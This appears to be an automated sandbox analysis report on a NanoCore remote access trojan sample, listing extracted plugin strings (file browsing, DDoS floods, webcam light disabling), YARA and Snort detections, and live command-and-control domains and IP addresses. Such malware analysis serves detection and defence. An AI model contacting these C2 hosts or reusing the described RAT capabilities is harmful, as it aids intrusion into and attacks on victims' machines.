Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002D2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		7_2_002D2163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002D1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		7_2_002D1B61

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.193.30.230	december2nd.ddns.net	Russian Federation		57844	SPD-NETTR	true
192.169.69.26	december2n.duckdns.org	United States		23033	WOWUS	true

Contacted Domains

Name	IP	Active
december2nd.ddns.net	212.193.30.230	true
december2n.duckdns.org	192.169.69.26	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
december2nd.ddns.net	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
december2n.duckdns.org	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: december2nd.ddns.net	Avira URL Cloud: Label: malware
Source: december2n.duckdns.org	Avira URL Cloud: Label: malware

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Found malware configuration

Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp

Multi AV Scanner detection for submitted file

Source: P05jmXYKpr.exe	ReversingLabs: Detection: 70%
Source: P05jmXYKpr.exe	Virustotal: Detection: 68%			Perma Link

Multi AV Scanner detection for domain / URL

Source: december2nd.ddns.net	Virustotal: Detection: 16%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 19%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 19%	Perma Link
Source: december2nd.ddns.net	Virustotal: Detection: 16%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

ReversingLabs: Detection: 52%

Uses 32bit PE files

Source: P05jmXYKpr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: P05jmXYKpr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: P05jmXYKpr.exe
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbj source: RegSvcs.exe, 0000000D.00000003.482399735.0000000001C53000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe, 0000000D.00000002.634072543.0000000001BEA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0095A69B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0096C220
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097B348 FindFirstFileExA,	0_2_0097B348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	7_2_002BE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_002BD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_002CA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	7_2_002CA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C65F1 FindFirstFileW,FindNextFileW,FindClose,	7_2_002C65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028C642 FindFirstFileExW,	7_2_0028C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C7248 FindFirstFileW,FindClose,	7_2_002C7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	7_2_002C72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_002BDB69

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49699 -> 192.169.69.26:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49700 -> 192.169.69.26:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49701 -> 192.169.69.26:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49702 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49702 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49703 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 212.193.30.230:61715 -> 192.168.2.3:49703
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49703 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49704 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49704 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49705 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49705 -> 212.193.30.230:61715

Uses dynamic DNS services

Source: unknown	DNS query: name: december2n.duckdns.org
Source: unknown	DNS query: name: december2nd.ddns.net

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: december2n.duckdns.org
Source: Malware configuration extractor	URLs: december2nd.ddns.net

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: SPD-NETTR SPD-NETTR
Source: Joe Sandbox View	ASN Name: WOWUS WOWUS

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230
Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49702 -> 212.193.30.230:61715

Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: P05jmXYKpr.exe, 00000000.00000003.381445625.0000000003082000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.381359513.0000000003080000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.380745820.0000000003080000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
